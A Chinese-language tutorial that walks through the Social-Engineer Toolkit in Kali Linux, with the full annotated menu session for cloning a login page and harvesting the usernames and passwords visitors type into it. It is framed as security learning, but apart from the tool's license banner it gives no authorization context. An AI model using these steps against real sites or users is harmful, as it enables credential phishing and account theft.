Social Engineer Toolkit(SET)是一个开源的社会工程学攻击工具包,旨在模拟和执行多种社会工程学攻击,例如钓鱼、恶意软件传播和其他形式的社会工程学攻击。SET由David Kennedy(也被称为"ReL1K")开发,主要用于测试网络安全防御的有效性,并提供有关防御漏洞的洞见。
SET提供了许多不同的攻击模块,可以生成钓鱼网站、恶意文件、社交工程攻击等。其功能包括:
-
钓鱼攻击:创建伪装成合法网站的钓鱼页面,用于诱骗用户输入敏感信息。
-
恶意文件生成:生成各种恶意文件,如Word文档、PDF文件、可执行文件等,用于传播恶意软件。
-
社交工程攻击:利用社交工程学原理,通过伪装身份或诱导目标用户来实现攻击目标。
-
快速信使攻击:通过社交媒体和即时通讯工具向目标发送恶意链接或文件。
-
载荷生成器:生成各种类型的恶意载荷,用于利用漏洞或实施远程访问。
-
其他工具和功能:SET还提供了其他一些辅助工具和功能,如自动化渗透测试、社会工程学工具和报告生成。
#打开root终端,输入setoolkit进入工具,遇到提示就输入y下一步,看如下即可。
┌──(root㉿kali)-[~]
└─# setoolkit
[-] New set.config.py file generated on: 2024-04-11 17:45:16.867147
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2024-04-11 17:45:16.867147
[*] SET is using the new config, no need to restart
Copyright 2020, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it).
Also note that by using this software, if you ever see the creator of SET in a bar, you should (optional) give him a hug and should (optional) buy him a beer (or bourbon - hopefully bourbon). Author has the option to refuse the hug (most likely will never happen) or the beer or bourbon (also most likely will never happen). Also by using this tool (these are all optional of course!), you should try to make this industry better, try to stay positive, try to help others, try to learn from one another, try stay out of drama, try offer free hugs when possible (and make sure recipient agrees to mutual hug), and try to do everything you can to be awesome.
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.
Do you agree to the terms of service [y/n]: y It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
Unable to check for new version of SET (is your network up?)
Select from the menu:
1) Social-Engineering Attacks #社会工程攻击
2) Penetration Testing (Fast-Track) #渗透测试
3) Third Party Modules #第三方模块
4) Update the Social-Engineer Toolkit #更新社会工程工具包
5) Update SET configuration #更新SET配置
6) Help, Credits, and About #帮助和关于
99) Exit the Social-Engineer Toolkit #退出
set> 1 #这里我们选择第一个,输入1按回车即可
Select from the menu:
1) Spear-Phishing Attack Vectors #鱼叉式钓鱼攻击向量
2) Website Attack Vectors #网站攻击向量
3) Infectious Media Generator #传染性媒体生成器
4) Create a Payload and Listener #创建负载和监听器
5) Mass Mailer Attack #大规模邮件攻击
6) Arduino-Based Attack Vector #基于Arduino的攻击向量
7) Wireless Access Point Attack Vector #无线接入点攻击向量
8) QRCode Generator Attack Vector #二维码生成器攻击向量
9) Powershell Attack Vectors #Powershell攻击向量
10) Third Party Modules #第三方模块
99) Return back to the main menu. #返回到主菜单
set> 2 #这里我们选择第2个并回车
1) Java Applet Attack Method #Java小程序攻击方法
2) Metasploit Browser Exploit Method #Metasploit浏览器利用方法
3) Credential Harvester Attack Method #凭证窃取攻击方法
4) Tabnabbing Attack Method #Tabnabbing攻击方法
5) Web Jacking Attack Method #Web劫持攻击方法
6) Multi-Attack Web Method #多重攻击Web方法
7) HTA Attack Method #HTA攻击方法
99) Return to Main Menu #返回主菜单
set:webattack>3 #这里我们选第三个并回车
1) Web Templates #网页模板
2) Site Cloner #网站克隆
3) Custom Import #自定义导入
99) Return to Webattack Menu #返回到Web攻击菜单
set:webattack>2 #这里算则第二个并回车
#这里输入的是你攻击机,即kali本机IP,并回车
set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.36.178.92]: 10.36.178.92
set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.36.178.92]: 10.36.178.92
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://note.chaosaigc.com/login/
#这里输入的就是你要克隆的网站的网址,然后回车即可下一步需要在网站上输入你的攻击机ip,即kali的IP即可进入克隆的钓鱼网站,当别人输入账户密码或者注册时你的kali终端这就会获取到。如下图:
这是被克隆的网站
这是克隆的网站
需要注意的是该克隆默认设置只可获取到以username 和password为字段的表单的信息,各网站设计者用的不一样,需要进一步学习实现克隆并获取。
